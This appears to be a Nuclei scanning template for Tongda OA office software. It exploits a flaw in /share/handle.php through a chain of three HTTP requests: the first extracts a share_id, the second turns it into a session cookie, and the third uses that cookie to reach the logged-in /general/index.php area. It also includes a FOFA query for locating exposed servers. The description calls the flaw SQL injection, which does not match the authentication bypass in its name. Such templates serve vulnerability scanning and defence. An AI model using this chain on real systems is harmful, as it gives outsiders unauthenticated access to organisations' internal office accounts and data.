id: TongDa-31

info:
  name: 通达OA share身份认证绕过漏洞
  author: attempt
  severity: high
  description: |
    通达OA /share/handle.php 存在前台SQL注入漏洞，攻击者无需登录可以利用漏洞获取数据库内敏感信息。
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="通达OA网络智能办公系统"
  tags: TongDa,OA,身份认证绕过
request:
  - raw:
      - |
        GET /share/handle.php?module=2&module_id=1 HTTP/1.1
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
        Host: {{RootURL}}
        Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
        Connection: close
      - |
        GET /share/index.php?share_id={{shareId}} HTTP/1.1
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
        Host: {{RootURL}}
        Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
        Connection: close
      - |
        GET /general/index.php HTTP/1.1
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
        Cookie: {{cookie}}
        Host: {{RootURL}}
        Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
        Connection: close
    extractors:
      - type: regex
        part: body_0
        name: shareId
        regex:
          - "share_id=([A-Za-z0-9-]+)"
      - type: kval
        part: header_1
        name: cookie
        kval:
          - set-cookie
    matchers:
      - type: status
        part: status_2
        status: 
          - 200